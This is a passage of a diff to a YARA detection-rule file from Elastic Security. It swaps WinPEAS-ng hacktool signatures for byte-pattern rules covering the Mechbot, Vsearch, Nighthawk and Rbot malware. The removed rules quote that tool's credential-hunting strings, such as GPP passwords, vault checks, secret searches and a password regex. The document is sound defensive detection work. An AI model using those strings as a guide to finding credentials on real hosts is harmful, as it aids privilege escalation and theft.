"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Infectionmonkey.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d941943046db48cf0eb7f11e144a79749848ae6b50014833c5390936e829f6c3" + logic_hash = "24cb368040fffe2743d0361a955d45a62a95a31c1744f3de15089169e365bb89" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "80b32022a69be8fc1d7e146c3c03623b51e2ee4206eb5f70be753477d68800d5" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "e9275f5fd8df389a4c99f69c09df1e3e515d8b958616e6d4d2c82d693deb4908" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $win_0 = "Interesting Events information" ascii wide - $win_1 = "PowerShell events" ascii wide - $win_2 = "Created (UTC)" ascii wide - $win_3 = "Printing Account Logon Events" ascii wide - $win_4 = "Subject User Name" ascii wide - $win_5 = "Target User Name" ascii wide - $win_6 = "NTLM relay might be possible" ascii wide - $win_7 = "You can obtain NetNTLMv2" ascii wide - $win_8 = "The following users have authenticated" ascii wide - $win_9 = "You must be an administrator" ascii wide + $a = { 75 14 8B 54 24 0C 83 FA FF 0F 44 D0 83 C4 1C 89 D0 C3 8D 74 } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_23Fee092 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mechbot_F2E1C5Aa : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, File analysis module" + description = "Detects Linux Trojan Mechbot (Linux.Trojan.Mechbot)" author = "Elastic Security" - id = "23fee092-f1ff-4d9e-9873-0a68360efb42" - date = "2022-12-21" - modified = "2023-02-01" + id = "f2e1c5aa-3318-4665-bee4-34a4afcf60bd" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L89-L115" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "ed019c9198b5d9ff8392bfd7e0b23a7b1383eabce4c71c665a3ca4a943c8b6ee" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mechbot.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5f8e80e6877ff2de09a12135ee1fc17bee8eb6d811a65495bcbcddf14ecb44a3" + logic_hash = "2ba9ece1ab2360702a59a737a20b6dbd8fca276b543477f9290ab80c6f51e2f1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4420faa4da440a9e2b1d8eadef2a1864c078fccf391ac3d7872abe1d738c926e" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "4b663b0756f2ae9b43eae29cd0225ad75517ef345982e8fdafa61f3c3db2d9f5" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $win_0 = "File Analysis" ascii wide - $win_1 = "apache*" ascii wide - $win_2 = "tomcat*" ascii wide - $win_3 = "had a timeout (ReDoS avoided but regex" ascii wide - $win_4 = "Error looking for regex" ascii wide - $win_5 = "Looking for secrets inside" ascii wide - $win_6 = "files with ext" ascii wide - $win_7 = "(limited to" ascii wide + $a = { 45 52 56 45 52 00 42 41 4E 4C 49 53 54 00 42 4F 4F 54 00 42 } condition: - 4 of them + all of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_861D3264 : FILE MEMORY +rule ELASTIC_Macos_Virus_Vsearch_0Dd3Ec6F : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, File Info module" + description = "Detects Macos Virus Vsearch (MacOS.Virus.Vsearch)" author = "Elastic Security" - id = "861d3264-34c3-4ff0-bdd3-44cb5ecce2c8" - date = "2022-12-21" - modified = "2023-02-01" + id = "0dd3ec6f-815f-40e1-bd53-495e0eae8196" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L117-L145" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "e6a0a0a24c70d69c0aa56063d2db0f5a0fedcda5b96d945ac14520524b1d00fd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Virus_Vsearch.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "17a467b000117ea6c39fbd40b502ac9c7d59a97408c2cdfb09c65b2bb09924e5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "03803621b6c9856443809889a14f1d2fa217812007878dd6cf9c3dc9e5f78f65" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "8adbd06894e81dc09e46d8257d4e5fcd99e714f54ffb36d5a8d6268ea25d0bd6" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $win_0 = "ConsoleHost_history.txt" ascii wide - $win_1 = "Interesting files and registry" ascii wide - $win_2 = "Cloud Credentials" ascii wide - $win_3 = "Accessed:{2} -- Size:{3}" ascii wide - $win_4 = "Unattend Files" ascii wide - $win_5 = "Looking for common SAM" ascii wide - $win_6 = "Found installed WSL distribution" ascii wide - $win_7 = "Check skipped, if you want to run it" ascii wide - $win_8 = "Cached GPP Passwords" ascii wide - $win_9 = "[cC][rR][eE][dD][eE][nN][tT][iI][aA][lL]|[pP][aA][sS][sS][wW][oO]" ascii wide + $a = { 2F 00 56 53 44 6F 77 6E 6C 6F 61 64 65 72 2E 6D 00 2F 4D 61 63 69 6E 74 6F 73 } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_57587F8C : FILE MEMORY +rule ELASTIC_Macos_Virus_Vsearch_2A0419F8 : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, Network module" + description = "Detects Macos Virus Vsearch (MacOS.Virus.Vsearch)" author = "Elastic Security" - id = "57587f8c-8fc6-41cc-bcb3-3d1d77c74222" - date = "2022-12-21" - modified = "2023-02-01" + id = "2a0419f8-95b2-4f87-a37a-ee0b65e344e9" + date = "2021-10-05" + modified = "2021-10-25" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L147-L175" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "175b8b6f9fca189f2fc41f1029ad512db2c8b0e52ea04bfbc3d410d355928ab9" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Virus_Vsearch.yar#L20-L37" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "fa9b811465e435bff5bc0f149ff65f57932c94f548a5ece4ec54ba775cdbb55a" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "9938c60113963da342dcb7de2252cffbeaa21d36f518e203f19a43da74d85f2d" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "2da9f0fc05bc8e23feb33b27142f46fb437af77766e39889a02ea843d52d17eb" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "macos" strings: - $win_0 = "Network Information" ascii wide - $win_1 = "Network Shares" ascii wide - $win_2 = "Permissions.*" ascii wide - $win_3 = "Network Ifaces and known hosts" ascii wide - $win_4 = "Enumerating IPv4 connections" ascii wide - $win_5 = "Showing only DENY rules" ascii wide - $win_6 = "File Permissions.*|Folder Permissions.*" ascii wide - $win_7 = "DNS cached --limit" ascii wide - $win_8 = "SELECT * FROM win32_networkconnection" ascii wide - $win_9 = "Enumerating Internet settings," ascii wide + $a = { 6F 72 6D 61 6C 2F 69 33 38 36 2F 56 53 44 6F 77 6E 6C 6F 61 64 65 72 2E 6F 00 } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_Cae025B1 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Nighthawk_9F3A5Abb : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, Process info module" + description = "Detects Windows Trojan Nighthawk (Windows.Trojan.Nighthawk)" author = "Elastic Security" - id = "cae025b1-bc2a-4eea-a1c1-c82d6e4fd71f" - date = "2022-12-21" - modified = "2023-02-01" + id = "9f3a5abb-b329-44db-af71-d72eae2737ac" + date = "2022-11-24" + modified = "2023-06-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L177-L203" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "9c34443cffed43513242321e2170484dbb0d41b251aee8ea640d44da76918122" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Nighthawk.yar#L1-L26" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b775a8f7629966592cc7727e2081924a7d7cf83edd7447aa60627a2b67d87c94" + logic_hash = "27a34e48141fe260c16c12a2652e440d2540ca5f0c84b41c9c4762dcab44ffd4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3e407824b258ef66ac6883d4c5dd3efeb0f744f8f64b099313cf83e96f9e968a" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "a2c49831d048ba91951780f4295895eba3a15f489a39b26b7a27efbc81746e09" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -64464,36 +65392,35 @@ rule ELASTIC_Windows_Hacktool_Winpeas_Ng_Cae025B1 : FILE MEMORY os = "windows" strings: - $win_0 = "Processes Information" ascii wide - $win_1 = "Interesting Processes -non Microsoft-" ascii wide - $win_2 = "Permissions:.*" ascii wide - $win_3 = "Possible DLL Hijacking.*" ascii wide - $win_4 = "ExecutablePath" ascii wide - $win_5 = "Vulnerable Leaked Handlers" ascii wide - $win_6 = "Possible DLL Hijacking folder:" ascii wide - $win_7 = "Command Line:" ascii wide + $loader_build_iat0 = { B9 BF BF D1 D5 E8 ?? ?? ?? ?? BA 7C 75 84 91 [3-12] E8 ?? ?? ?? ?? BA 47 FB EB 2B [3-12] E8 ?? ?? ?? ?? BA 42 24 3D 39 [3-12] E8 ?? ?? ?? ?? BA E7 E9 EF EE [3-12] E8 ?? ?? ?? ?? BA 47 FD 36 2E [3-12] E8 ?? ?? ?? ?? BA 39 DE 19 3D [3-12] E8 ?? ?? ?? ?? BA 20 DF DB F7 [3-12] E8 ?? ?? ?? ?? BA 45 34 2A 41 [3-12] E8 ?? ?? ?? ?? BA 7D 1C 44 2E [3-12] E8 ?? ?? ?? ?? BA 7D 28 44 2E [3-12] E8 ?? ?? ?? ?? BA 94 36 65 8D [3-12] E8 ?? ?? ?? ?? } + $loader_syscall_func = { 65 48 8B 04 25 30 00 00 00 48 8B 80 10 01 00 00 48 89 44 24 F0 65 48 8B 04 25 30 00 00 00 8B 40 68 49 89 CA FF 64 24 F0 } + $seq_calc_offset = { 48 8D 0D ?? ?? ?? ?? 51 5A 48 81 C1 ?? ?? ?? ?? 48 81 C2 ?? ?? ?? ?? FF E2 } + $seq_keying_registry = { BA ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B CB 4C 8B F0 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B CB 4C 8B F8 E8 ?? ?? ?? ?? 0F B6 4E ?? 48 8B D8 83 E9 ?? 74 ?? 83 F9 ?? 75 ?? 48 C7 C1 ?? ?? ?? ?? EB ?? } + $seq_keying_hostname_user = { 40 53 48 83 EC ?? 8A 42 ?? 48 8B D9 3C ?? 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8D 53 ?? 48 8D 4B ?? C7 02 ?? ?? ?? ?? FF D0 85 C0 0F 95 C0 EB ?? } + $seq_keying_file = { E8 ?? ?? ?? ?? 33 DB 48 8D 4E ?? 48 89 5C 24 ?? 45 33 C9 89 5C 24 ?? BA ?? ?? ?? ?? 4C 8B E0 89 5C 24 ?? 44 8D 43 ?? C7 44 24 ?? ?? ?? ?? ?? FF D7 48 8B F8 48 83 F8 ?? 74 ?? 8B 55 ?? 45 33 C9 45 33 C0 48 8B C8 } + $seq_crypto_op = { 40 84 F6 74 ?? 48 8B C2 B9 04 00 00 00 F3 0F 6F 44 05 ?? F3 0F 6F 4C 05 ?? 48 8D 40 ?? 66 0F EF C8 F3 0F 7F 4C 05 ?? 48 83 E9 01 } + $seq_byte_shift = { 48 83 C3 ?? 8D 4D ?? 48 03 CF 0F B6 41 ?? 0F B6 71 ?? C1 E6 08 0B F0 0F B6 41 ?? C1 E6 08 0B F0 0F B6 01 C1 E6 ?? 0B F0 41 3B 75 ?? 76 ?? B8 ?? ?? ?? ?? EB ?? } condition: - 5 of them + ($loader_build_iat0 and $loader_syscall_func) or (2 of ($seq*)) } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_4A9B9603 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Nighthawk_2A2E3B9D : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, Services info module" + description = "Detects Windows Trojan Nighthawk (Windows.Trojan.Nighthawk)" author = "Elastic Security" - id = "4a9b9603-7b42-4a85-b66a-7f4ec0013338" - date = "2022-12-21" - modified = "2023-02-01" + id = "2a2e3b9d-e85f-43b6-9754-1aa7c9f6f978" + date = "2022-11-24" + modified = "2023-06-20" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L205-L231" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "8d78483b54d3be6988b1f5df826b8709b7aa2045ff3a3e754c359365d053bb27" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Nighthawk.yar#L28-L47" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "38881b87826f184cc91559555a3456ecf00128e01986a9df36a72d60fb179ccf" + logic_hash = "c42605ebba900fafb4ec2d34d93bb7adb69e731ce151b82a95889dd0d738da00" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2a7b0e1d850fa6a24f590755ae5610309741e520e4b2bc067f54a8e086444da2" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "40912e8d6bd09754046598b1311080e0ec6e040cb1b9ca93003c6314725d4d45" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -64501,36 +65428,29 @@ rule ELASTIC_Windows_Hacktool_Winpeas_Ng_4A9B9603 : FILE MEMORY os = "windows" strings: - $win_0 = "Services Information" ascii wide - $win_1 = "Interesting Services -non Microsoft-" ascii wide - $win_2 = "FilteredPath" ascii wide - $win_3 = "YOU CAN MODIFY THIS SERVICE:" ascii wide - $win_4 = "Modifiable Services" ascii wide - $win_5 = "AccessSystemSecurity" ascii wide - $win_6 = "Looks like you cannot change the" ascii wide - $win_7 = "Checking write permissions in" ascii wide + $payload_bytes1 = { 66 C1 E0 05 66 33 D0 66 C1 E2 0A 66 0B D1 0F B7 D2 8B CA 0F B7 C2 C1 E9 02 33 CA 66 D1 E8 D1 E9 33 CA C1 E9 02 33 CA C1 E2 0F 83 E1 01 } + $payload_bytes2 = { 48 8B D9 44 8B C2 41 C1 E0 0F 8B C2 F7 D0 48 8B F2 44 03 C0 41 8B C0 C1 E8 0C 41 33 C0 8D 04 80 8B C8 C1 E9 04 33 C8 44 69 C1 09 08 00 00 41 8B C0 C1 E8 10 44 33 C0 B8 85 1C A7 AA } condition: - 4 of them + any of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_4Db2C852 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Nighthawk_23489175 : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, System info module" + description = "Detects Windows Trojan Nighthawk (Windows.Trojan.Nighthawk)" author = "Elastic Security" - id = "4db2c852-6c03-4672-9250-f80671b93e1b" - date = "2022-12-21" - modified = "2023-02-01" + id = "23489175-ed41-4f43-ac85-b9ae3ffb55d9" + date = "2023-06-14" + modified = "2023-07-10" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L233-L261" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "88c88103a055d25ba97f08e2f47881001ad8a2200a33ac04246494963dfe6638" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Nighthawk.yar#L49-L74" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "697742d5dd071add40b700022fd30424cb231ffde223d21bd83a44890e06762f" + logic_hash = "be41fc53f7098ca3cf718e8066a488196423ede993466c9a24ad2af387e03b24" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f05862b7b74cb4741aa953d725336005cdb9b1d50a92ce8bb295114e27f81b2a" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "3ff9fe5ef10afa328025a6abd509af788a9b1d5ef73a379e3767b2a4291566a3" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -64538,388 +65458,366 @@ rule ELASTIC_Windows_Hacktool_Winpeas_Ng_4Db2C852 : FILE MEMORY os = "windows" strings: - $win_0 = "No prompting|PromptForNonWindowsBinaries" ascii wide - $win_1 = "System Information" ascii wide - $win_2 = "Showing All Microsoft Updates" ascii wide - $win_3 = "GetTotalHistoryCount" ascii wide - $win_4 = "PS history size:" ascii wide - $win_5 = "powershell_transcript*" ascii wide - $win_6 = "Check what is being logged" ascii wide - $win_7 = "WEF Settings" ascii wide - $win_8 = "CredentialGuard is active" ascii wide - $win_9 = "cachedlogonscount is" ascii wide + $pdb = "C:\\Users\\Peter\\Desktop\\dev\\implant\\CommsChannel\\x64\\Release-ReflectiveDLL\\Implant.x64.pdb" ascii fullword + $seq_str_decrypt = { 48 8B C3 48 83 7B ?? ?? 72 ?? 48 8B 03 0F BE 14 06 49 8B CF E8 ?? ?? ?? ?? 48 85 C0 74 ?? 49 2B C7 48 8D 0D ?? ?? ?? ?? 8A 0C 08 48 8B C3 48 83 7B ?? ?? 72 ?? 48 8B 03 88 0C 06 } + $seq_hvnc = { BA 06 01 00 00 41 B9 00 00 20 A0 41 B8 20 00 00 00 48 8B CE FF 15 } + $seq_pe_parsing = { 8B 44 24 ?? 48 6B C0 28 48 8B 4C 24 ?? 8B 44 01 ?? 48 8B 8C 24 ?? ?? ?? ?? 48 03 C8 48 8B C1 48 89 44 24 ?? 8B 44 24 ?? 48 6B C0 28 48 8B 4C 24 ?? 8B 44 01 ?? 89 44 24 ?? EB ?? } + $seq_library_resolver = { 48 8B 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 44 24 ?? 48 63 40 ?? 48 8B 4C 24 ?? 48 03 C8 48 8B C1 48 89 44 24 ?? B8 ?? ?? ?? ?? 48 6B C0 ?? 48 8B 4C 24 ?? 8B 84 01 ?? ?? ?? ?? 89 44 24 ?? 83 7C 24 ?? ?? 75 ?? 33 C0 E9 ?? ?? ?? ?? } + $seq_disk_info = { 4C 8B A3 B0 00 00 00 48 8B BB A8 00 00 00 49 3B FC 0F 84 ?? ?? ?? ?? 48 8D B3 D8 00 00 00 4C 8D B3 F0 00 00 00 4C 8D BB C0 00 00 00 45 33 ED } + $seq_keyname = { 8B 4B 08 C1 E1 08 0B 4B 04 C1 E1 10 41 B8 40 00 00 00 48 8D 95 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? } + $seq_tcptable = { 41 BF 02 00 00 00 41 3B FF 74 ?? 83 FF 17 41 8B C7 75 ?? B8 08 00 00 00 } condition: - 5 of them + (1 of ($pdb)) or (2 of ($seq*)) } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_Bcedc8B2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rbot_C69475E3 : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, User info module" + description = "Detects Linux Trojan Rbot (Linux.Trojan.Rbot)" author = "Elastic Security" - id = "bcedc8b2-d9e1-45cd-94b4-a19a3ed8c0f9" - date = "2022-12-21" - modified = "2023-02-01" + id = "c69475e3-59eb-4d3c-9ee6-01ae7a3973d3" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L263-L291" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "7f0a6a9168b5ff7cc02ccadd211cc8096307651be65c2b3e7cc9fdbbde08ab9f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rbot.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9d97c69b65d2900c39ca012fe0486e6a6abceebb890cbb6d2e091bb90f6b9690" + logic_hash = "2a8629ebf6e2082ce90f1b2130ae596e4e515f3289a25899f2fc57b99c01a654" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "039ea2f11596d6a8d5da05944796424ee6be66e16742676bbb2dc3fcf274cf4a" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "593ff388ba10d66b97b5dfc9220bbda6b1584fe73d6bf7c1aa0f5391bb87e939" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $win_0 = "Users Information" ascii wide - $win_1 = "docker|Remote |DNSAdmins|AD Recycle Bin|" ascii wide - $win_2 = "NotChange|NotExpi" ascii wide - $win_3 = "Current Token privileges" ascii wide - $win_4 = "Clipboard text" ascii wide - $win_5 = "{0,-10}{1,-15}{2,-15}{3,-25}{4,-10}{5}" ascii wide - $win_6 = "Ever logged users" ascii wide - $win_7 = "Some AutoLogon credentials were found" ascii wide - $win_8 = "Current User Idle Time" ascii wide - $win_9 = "DsRegCmd.exe /status" ascii wide + $a = { 56 8B 76 20 03 F5 33 C9 49 41 AD 33 DB 36 0F BE 14 28 38 F2 } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_B6Bb3E7C : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rbot_96625C8C : FILE MEMORY { meta: - description = "WinPEAS detection based on the dotNet binary, Windows credentials module" + description = "Detects Linux Trojan Rbot (Linux.Trojan.Rbot)" author = "Elastic Security" - id = "b6bb3e7c-29f6-4bc6-8082-558a56512fc3" - date = "2022-12-21" - modified = "2023-02-01" + id = "96625c8c-897c-4bf0-97e7-0dc04595cb94" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L293-L321" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "e2eaf91b9c5d3616fb2f6f6bc4b44841b1efa3b4efe7ac72afe225728523af75" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rbot.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a052cfad3034d851c6fad62cc8f9c65bceedc73f3e6a37c9befe52720fd0890e" + logic_hash = "5a9671e10e7b9b58ecf9fab231de18b4b6039c9d351b145fae1705297acda95e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "ecc2217349244cd78fa5be040653c02096ee8b6a2f2691309fd7f9f62612fa79" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "5dfabf693c87742ffa212573dded84a2c341628b79c7d11c16be493957c71a69" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $win_0 = "Windows Credentials" ascii wide - $win_1 = "Checking Windows Vault" ascii wide - $win_2 = "Identity.*|Credential.*|Resource.*" ascii wide - $win_3 = "Checking Credential manager" ascii wide - $win_4 = "Saved RDP connections" ascii wide - $win_5 = "Recently run commands" ascii wide - $win_6 = "Checking for DPAPI" ascii wide - $win_7 = "Checking for RDCMan" ascii wide - $win_8 = "Looking for saved Wifi credentials" ascii wide - $win_9 = "Looking AppCmd.exe" ascii wide + $a = { 24 28 8B 45 3C 8B 54 05 78 01 EA 8B 4A 18 8B 5A 20 01 EB E3 38 49 8B } condition: - 5 of them + all of them } -rule ELASTIC_Windows_Hacktool_Winpeas_Ng_94474B0B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Rbot_366F1599 : FILE MEMORY { meta: - description = "WinPEAS detection based on the bat script" + description = "Detects Linux Trojan Rbot (Linux.Trojan.Rbot)" author = "Elastic Security" - id = "94474b0b-c3dc-4585-afb3-3afe4c3ec525" - date = "2022-12-21" - modified = "2023-02-01" + id = "366f1599-a287-44e6-bc2c-d835b2c2c024" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_WinPEAS_ng.yar#L323-L351" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f3e1e5b6fd2d548dfe0af8730b15eb7ef40e128a0777855f569b2a99d6101195" - logic_hash = "e209c9ce1f4b11c5fdeade3298329d62f5cf561403c87077d94b6921e81ffaea" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Rbot.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5553d154a0e02e7f97415299eeae78e5bb0ecfbf5454e3933d6fd9675d78b3eb" + logic_hash = "3efe0f35efd855b415149513e8abb2210a26ef6f3b6c31275c8147fabb634fab" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "06e184fb837274271711288994a3e6bfcc2a50472ca05c8af9f1e4d8efd9091d" - threat_name = "Windows.Hacktool.WinPEAS-ng" + fingerprint = "27166c9dab20d40c10a4f0ea5d0084be63fef48748395dd55c7a13ab6468e16d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $win_0 = "Windows local Privilege Escalation Awesome Script" ascii wide - $win_1 = "BASIC SYSTEM INFO" ascii wide - $win_2 = "LAPS installed?" 